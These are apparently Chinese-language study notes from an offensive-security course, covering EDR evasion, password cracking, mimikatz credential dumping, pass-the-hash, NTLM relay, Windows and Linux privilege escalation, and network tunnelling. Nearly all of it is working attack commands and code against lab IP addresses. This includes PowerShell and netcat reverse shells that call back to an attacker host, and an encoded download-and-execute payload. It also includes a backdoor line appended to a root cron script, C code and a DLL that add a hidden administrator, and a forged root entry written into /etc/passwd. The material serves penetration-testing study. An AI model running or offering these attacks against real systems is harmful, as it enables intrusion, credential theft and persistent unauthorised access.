保存成bypass.ps1,可以过掉一部分EDR

在windows上运行还需要关闭执行策略的防护

查看执行策略

1
2
3
Get-ExecutionPolicy -Scope CurrentUser

Undefined

修改

1
2
3
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

选A

再次查看

1
2
3
Get-ExecutionPolicy -Scope CurrentUser

Unrestricted

执行bypass.ps1获得shell

1
PS C:\Users\offsec\Desktop> .\bypass.ps1

14.3.3 自动化工具

安装

1
2
3
4
apt-cache search shellter
sudo apt install shellter
sudo apt install wine
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

运行

1
2
3
4
5
6
7
8
shellter 
A   -- 自动化插入
输入一个要插入的PE文件
Y   -- 进入shellter模式
L   -- 选择列表里的payload
1   -- 第一个反弹shell
输入lhost和lport
生成

msf本地监听,运行生成的PE文件获得shell

1
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"

本篇对应教材第15章,主要内容”网络服务密码爆破”、”密码破解基础”、”使用密码hash”,记录使用工具和命令

15.1 网络服务密码爆破

15.1.1 SSH和RDP

ssh密码爆破

1
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201

rdp密码喷洒

1
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

15.1.2 HTTP页面POST爆破

1
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

15.2 密码破解基础

15.2.2 字典变异

去少量字典演示

1
head /usr/share/wordlists/rockyou.txt > demo.txt

去掉1开头的行

1
sed -i '/^1/d' demo.txt

创建规则文件(末尾加1)

1
echo \$1 > demo.rule

hashcat查看规则后的字典

1
hashcat -r demo.rule --stdout demo.txt

比较两个不同规则文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
kali@kali:~/passwordattacks$ cat demo1.rule   
$1 c
     
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231

kali@kali:~/passwordattacks$ cat demo2.rule   
$1
c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
kali@kali:~/passwordattacks$ cat demo1.rule   
$1 c $!
     
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!

kali@kali:~/passwordattacks$ cat demo2.rule   
$! $1 c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1

演示破解hash

1
2
3
4
5
6
7
kali@kali:~/passwordattacks$ cat crackme.txt   
f621b6c9eab51a3e2f4e167fee4c6860

kali@kali:~/passwordattacks$ cat demo3.rule   
$1 c $!
$2 c $!
$1 $2 $3 c $!

破解

1
hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force

查看默认规则

1
ls -la /usr/share/hashcat/rules/

15.2.4 密码管理软件

keepass的存储文件是.kdbx后缀

1
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

提取hash

1
keepass2john Database.kdbx > keepass.hash

删除hash中开头的

1
Database:

删除后是这样的

1
2
kali@kali:~/passwordattacks$ cat keepass.hash   
$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e...

查看hashcat的破解策略

1
hashcat --help | grep -i "KeePass"

破解

1
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

也可以用john直接破解不用修改hash文件

15.2.5 SSH秘钥破解

1
2
3
4
5
ssh2john id_rsa > ssh.hash
cat ssh.hash
$6
hashcat -h | grep -i "ssh"
$6对应 22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)

创建规则

1
2
3
4
kali@kali:~/passwordattacks$ cat ssh.rule
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#

创建字典

1
2
3
4
5
6
7
kali@kali:~/passwordattacks$ cat ssh.passwords
Window
rickc137
dave
superdave
megadave
umbrella

破解

1
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force

或者将规则计入到john配置里进行破解

1
2
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

得到密码,进行ssh登录

1
2
ssh -i id_rsa -p 2222 dave@192.168.50.201
输入密码即可登录成功

15.3 使用密码hash

15.3.1 NTLM破解

查看本地用户

1
PS C:\Users\offsec> Get-LocalUser

管理员身份运行cmd或者powershell(mimikatz需要管理员权限)

1
2
3
4
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

获得SAM里面的hash

1
2
User : nelly
  Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10

破解

1
2
hashcat --help | grep -i "ntlm"
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

15.3.2 NTLM传递

mimikatz获取hash

1
2
3
4
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam

获得administrator的hash,使用smbclient进行hash传递

1
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

可以获得smb共享以及文件

或者使用psexec传递,获得shell

1
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

也可以使用wmiexec传递获得shell

1
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

15.3.3 Net-NTLMv2破解

获取hash,本地(192.168.119.2)开启监听

1
2
ip a
sudo responder -I tap0

目标机器上执行命令

1
dir \\\\192.168.119.2\\test

获得hsah

1
2
3
4
[+] Listening for events... 
[SMB] NTLMv2-SSP Client   : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E00480055005800430034005400490043002E00360057004D0052002E004C004F00430041004C0003001400360057004D0052002E004C004F00430041004C0005001400360057004D0052002E004C004F00430041004C000700080000B050CD1777D801060004000200000008003000300000000000000000000000002000008BA7AF42BFD51D70090007951B57CB2F5546F7B599BC577CCD13187CFC5EF4790A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E003100310038002E0032000000000000000000

保存hash,查看破解策略

1
2
3
hashcat --help | grep -i "ntlm"

 5600 | NetNTLMv2

破解

1
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force

15.3.4 Net-NTLMv2中继/转发

破解不出密码时,可以转发

1
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3ACAALQBwACAAOQAwADkAMAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

报错的话需要用python3调用py脚本

1
python3 /usr/local/bin/ntlmrelayx.py --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA3ACAALQBwACAAOQAwADkAMAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

powershell命令需要base64编码

1
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
1
2
3
4
5
pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

本篇对应教材第16章,主要内容”Windows提权信息枚举”、”利用Windows服务”、”利用其他Windows组件”,记录使用工具和命令

16.1 Windows提权信息枚举

16.1.2 基本信息枚举

查看当前用户和组

1
2
whoami
whoami /groups
1
2
3
4
5
powershell
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember adminteam
Get-LocalGroupMember Administrators

查看系统信息

1
systeminfo

查看网络和路由信息

1
2
3
ipconfig /all
route print
netstat -ano

查看软件安装信息(32位和64位)

1
2
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

查看当前进程

1
Get-Process

16.1.3 密码明文存储

查找密码文件,关注常见的密码文件

1
2
3
4
.kdbx -- keepass的密码存储文件
type C:\xampp\passwords.txt
type C:\xampp\mysql\bin\my.ini
cat Desktop\asdf.txt
1
2
3
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

获得密码后可以运行用户下的cmd

1
PS C:\Users\steve> runas /user:backupadmin cmd

16.1.4 powershell历史记录

查看历史

1
Get-History

历史文件位置

1
(Get-PSReadlineOption).HistorySavePath

查看历史文件

1
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

历史文件中找到敏感文件

1
type C:\Users\Public\Transcripts\transcript01.txt

敏感文件里有密码和session连接信息,使用信息进行session连接

1
2
3
4
$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
whoami

PSSession下执行命令可能没有回显,使用winrm,主要密码中特殊字符需要转译

1
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"

16.1.5 自动枚举

winpeas

1
2
3
4
5
6
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80

powershell
iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe

16.2 利用Windows服务

16.2.1 服务二进制文件劫持

查看服务

1
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

查看服务的二进制文件访问权限

1
2
icacls "C:\xampp\apache\bin\httpd.exe"
icacls "C:\xampp\mysql\bin\mysqld.exe"
Mask掩模 Permissions权限
F Full access完全访问权限
M Modify access修改访问
RX Read and execute access读取和执行访问
R Read-only access只读访问
W Write-only access只写存取

关注F和W权限的

创建添加用户程序

1
2
3
4
5
6
7
8
9
10
11
#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

编译

1
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

下载替换文件

1
2
3
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

重启服务

1
net stop mysql

如果没有权限,可以看看服务是不是开机自启,如果是就看看是不是可以重启机器

1
2
3
4
5
6
7
8
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
whoami /priv
有SeShutdownPrivilege就可以重启

shutdown /r /t 0

重启后查看用户
Get-LocalGroupMember administrators

也可以使用自动化工具PowerUp.ps1

1
2
3
4
5
6
7
8
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
python3 -m http.server 80

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'mysql'

报错,有时不能盲目相信自动化工具,需要手动利用。

16.2.2 服务DLL劫持

枚举服务

1
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

查看二进制文件权限

1
icacls .\Documents\BetaServ.exe

可读可执行,不能替换,使用Procmon64.exe查看进程调用dll情况

点击Filter添加过滤规则

1
Process Name is BetaServ.exe

然后重启服务

1
Restart-Service BetaService

看到多次调用myDLL.dll

查看环境变量

1
2
PS C:\Users\steve> $env:path
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\steve\AppData\Local\Microsoft\WindowsApps;

在第一个调用路径上放置dll文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
   	    i = system ("net user dave2 password123! /add");
   	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

编译

1
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

放置在一个调用路径,需要是一个可写目录,如:

1
C:\Users\steve\Documents 
1
2
3
cd Documents
iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll
net user

重启服务,dll被加载,代码被运行

1
2
3
Restart-Service BetaService
net user
net localgroup administrators

添加管理员成功

16.2.3 无引号文件路径

路径中存在空格时且路径没有被引号包裹,文件执行顺序如下:

1
2
3
4
5
6
C:\Program Files\My Program\My Service\service.exe
顺序:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

枚举服务和路径信息(powershell)

1
Get-CimInstance -ClassName win32_service | Select Name,State,PathName

枚举没有引号路径的服务(cmd)

1
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

发现服务

1
2
3
Name                                       PathName                                                                   
...                                                                                                       
GammaService                               C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

测试起是否可以被启动和停止

1
2
Start-Service GammaService
Stop-Service GammaService

文件执行顺序

1
2
3
4
C:\Program.exe
C:\Program Files\Enterprise.exe
C:\Program Files\Enterprise Apps\Current.exe
C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe

检查路径是否可写

1
2
3
icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

需要有F或者W权限,如

1
C:\Program Files\Enterprise Apps
1
2
3
4
5
6
iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
Start-Service GammaService

net user
net localgroup administrators

自动化工具PowerUp

1
2
3
4
5
6
7
8
9
iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService

Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
Restart-Service GammaService
net user
net localgroup administrators

16.3 利用其他Windows组件

16.3.1 计划任务

查看

1
schtasks /query /fo LIST /v

关注任务名、下一次执行时间、作者、文件路径等信息

查看是否可以替换

1
icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

替换

1
2
3
iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\

等执行时间过后,查看

1
2
net user
net localgroup administrators

16.3.2 使用漏洞

查看权限

1
whoami /priv

有SeImpersonatePrivilege可以用PrintSpoofer或者土豆系列

1
2
3
4
5
6
7
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
python3 -m http.server 80

powershell
iwr -uri http://192.168.119.2/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
whoami

本篇对应教材第17章,主要内容”Linux提权信息枚举”、”敏感信息”、”不安全的文件权限”和”不安全的系统组件”,记录使用工具和命令

17.1 linux提权信息枚举

17.1.2 手动枚举

文件权限

1
ls -l /etc/shadow

当前用户id

1
id

所有用户

1
cat /etc/passwd

主机名

1
hostname

操作系统信息

1
2
3
cat /etc/issue
cat /etc/os-release
uname -a

进程信息

1
ps aux

关注root权限的

网络信息

1
2
3
ip a
routel
ss -anp

防火墙规则

1
cat /etc/iptables/rules.v4

计划任务

1
ls -lah /etc/cron*

关注是否有root权限的文件可以替换

查看当前用户计划任务

1
2
crontab -l
sudo crontab -l

查看已安装程序

1
dpkg -l

搜索可写目录

1
find / -writable -type d 2>/dev/null

查看已安装文件系统和驱动器

1
2
cat /etc/fstab
mount

查看可用磁盘

1
lsblk

可能有未挂载的磁盘里面有敏感信息

查看内核模块

1
lsmod

查看模块信息

1
/sbin/modinfo libata

查找SUID二进制文件

1
find / -perm -u=s -type f 2>/dev/null

17.1.3 自动枚举

1
2
unix-privesc-check
./unix-privesc-check standard > output.txt

如/etc/passwd文件可写提权

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation

其他辅助脚本

1
2
https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

17.2 敏感信息

17.2.1 用户配置中的敏感信息

环境变量(比如密码等信息)

1
env

bash配置文件(比如密码等信息)

1
cat .bashrc

找到密码后切换用户

1
2
su - root
whoami

根据密码做字典

1
crunch 6 6 -t Lab%%% > wordlist

破解指定用户密码

1
hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

登录后查看sudo

1
2
3
4
5
ssh eve@192.168.50.214
sudo -l

User eve may run the following commands on debian-privesc:
    (ALL : ALL) ALL

直接sudo提权

1
2
3
sudo -i
输入eve密码,获得root
whoami

17.2.2 服务运行痕迹

监测进程中的敏感信息

1
watch -n 1 "ps -aux | grep pass"

监测网络通信中的敏感信息

1
sudo tcpdump -i lo -A | grep "pass"

17.3 不安全的文件权限

17.3.1 利用CRON

查看cron日志

1
grep "CRON" /var/log/syslog

关注root定时运行的文件,找到后查看内容和权限

1
2
cat /home/joe/.scripts/user_backups.sh
ls -lah /home/joe/.scripts/user_backups.sh

可写,插入一句话后门

1
2
3
4
5
6
cd .scripts
echo >> user_backups.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh
cat user_backups.sh

nc -lnvp 1234

17.3.2 利用密码校验

/etc/passwd可写

1
2
3
4
5
openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
Password: w00t
id

17.4 不安全系统组件

17.4.1 利用Setuid二进制文件

查看文件的SUID标志位

1
ls -asl /usr/bin/passwd

find

1
find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

getcap

1
/usr/sbin/getcap -r / 2>/dev/null

perl

1
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

更多suid提权利用查看

https://gtfobins.github.io/

17.4.2 sudo利用

查看当前用户可以使用的特权命令

1
sudo -l

查看https://gtfobins.github.io/,发现

1
2
3
4
5
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

没有成功,提示

1
failed: Permission denied

查看日志

1
cat /var/log/syslog | grep tcpdump

发现是AppArmor限制了,root权限后查看apparmor状态信息

1
2
3
4
su - root
aa-status
发现
/usr/sbin/tcpdump

换一个apt-get

1
2
sudo apt-get changelog apt
!/bin/sh

提权成功

17.4.3 内核漏洞提权

查看架构及内核版本信息

1
2
3
cat /etc/issue
uname -r
arch

搜索漏洞

1
searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
1
2
3
4
5
6
7
cp /usr/share/exploitdb/exploits/linux/local/45010.c .
head 45010.c -n 20
mv 45010.c cve-2017-16995.c
scp cve-2017-16995.c joe@192.168.123.216:
gcc cve-2017-16995.c -o cve-2017-16995
file cve-2017-16995
./cve-2017-16995

提权成功

本篇对应教材第18章,主要内容”Linux端口转发”、”SSH隧道”、”Windows端口转发”,记录使用工具和命令

18.2 使用linux工具端口转发

18.2.3 socat端口转发

跳板机上

1
socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

kali上连接跳板机的2345端口就会转发到内网10.4.50.215:5432端口

1
psql -h 192.168.50.63 -p 2345 -U postgres

登录postgres数据库,查看数据库信息,查看表信息,查看内容

1
2
3
\l
\c confluence
select * from cwd_user;

获得密码进行暴力破解

1
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

破解出密码后,在跳板机上做端口转发

1
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

kali上ssh连上去

1
ssh database_admin@192.168.50.63 -p2222

18.3 SSH隧道

18.3.1 本地端口转发

kali(192)—跳板1(192和10)—跳板2(10和172)–目标(172)

ssh需要交互式shell操作,需要在跳板1上转换交互式shell

1
2
3
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh database_admin@10.4.50.215
ip addr

在跳板2上发现172段,查看路由,并扫描172段存活主机445端口

1
2
ip route
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

发现一台

1
172.16.50.217 445

现在想要在kali上连接172段的445端口

在跳板1上做本地端口转发到跳板2的172段

1
2
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
ss -ntplu

kali上连接

1
2
3
4
smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234
ls
get Provisioning.ps1

成功下载172主机上的ps1文件

18.3.2 动态端口转发

kali(192)—跳板1(192和10)—跳板2(10和172)–目标(172)

跳板1上开启9999端口做socks代理

1
2
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

kali上设置proxychains4

1
2
3
tail /etc/proxychains4.conf

socks5 192.168.50.63 9999
1
2
3
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

18.3.3 远程端口转发

kali(192)—跳板1(192和10)—跳板2(10和172)–目标(172)

kali上开启ssh服务

1
2
sudo systemctl start ssh
sudo ss -ntplu

跳板1上ssh连接kali

1
2
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

连接成功后kali上会开启2345端口,kali上连接自己的2345就是跳板2的5432端口

1
2
ss -ntplu
psql -h 127.0.0.1 -p 2345 -U postgres

18.3.4 远程动态端口转发

kali(192)—跳板1(192和10)—跳板2(10和172)–目标(172)

跳板1上ssh连接kali

1
2
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -R 9998 kali@192.168.118.4

连接成功后kali上开启了9998的socks代理

1
2
3
4
sudo ss -ntplu
tail /etc/proxychains4.conf
socks5 127.0.0.1 9998
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

18.3.5 sshuttle

kali(192)—跳板1(192和10)—跳板2(10和172)–目标(172)

跳板1上做端口转发

1
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

kali上通过跳板1的转发ssh到跳板2上,并添加10和172网段

1
sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24

连接成功后kali可以直接访问10和172段

1
smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

18.4 Windows端口转发工具

18.4.1 ssh.exe

kali(192)—win跳板1(192和10)—目标(10)

kali上开启ssh服务

1
sudo systemctl start ssh

rdp到跳板1上,找到ssh.exe,连接kali

1
2
3
4
5
xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
where ssh
ssh.exe -V
版本高于7.6才可以做端口转发
ssh -N -R 9998 kali@192.168.118.4

kali上开启了9998的socks代理,配置proxychains后可以连10段主机

1
2
3
4
5
ss -ntplu
tail /etc/proxychains4.conf
socks5 127.0.0.1 9998
proxychains psql -h 10.4.50.215 -U postgres
\l

kali(192)—防火墙(屏蔽连接跳板1的3389端口)—win跳板1(192)

开上开启80端口web服务供下载文件

1
2
3
4
5
6
7
sudo systemctl start apache2
find / -name nc.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
find / -name plink.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/

nc -nvlp 4446

跳板1上使用webshell下载nc,反弹shell到kali上

1
2
3
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

下载plink后,做ssh到kali,开启kali的9833端口,连接到跳板1的3389端口

1
C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

kali上查看开启端口,并rdp本机9833就是跳板1的3389端口

1
2
ss -ntplu
xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

18.4.3 Netsh

kali(192)—win跳板1(192和10)—目标(10)

跳板1上做转发

1
2
3
xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
管理员运行cmd
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

映射跳板2222端口到目标的22端口,查看跳板2222是否开放及代理列表

1
2
netstat -anp TCP | find "2222"
netsh interface portproxy show all

kali扫描跳板的2222端口

1
sudo nmap -sS 192.168.50.64 -Pn -n -p2222

不成功,因为Windows防火墙会阻止kali连接2222端口,防火墙增加一条规则,允许入向连接2222端口

1
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

kali连接目标成功

1
2
sudo nmap -sS 192.168.50.64 -Pn -n -p2222
ssh database_admin@192.168.50.64 -p2222

删除防火墙及代理策略

1
2
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

本篇对应教材第19章,主要内容”HTTP隧道”、”DNS隧道”,记录使用工具和命令

19.1 HTTP隧道

19.1.2 使用chisel搭建HTTP隧道

kali(192)—linux跳板1(192和10)—目标(10)

kali开启web服务提供下载chisel使用,并开启chisel反向代理

1
2
3
4
5
6
sudo systemctl start apache2
wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz
gunzip chisel_1.8.1_linux_amd64.gz
sudo cp ./chisel /var/www/html

chisel server --port 8080 --reverse

在linux跳板1上下载并执行

1
2
wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel
/tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 &

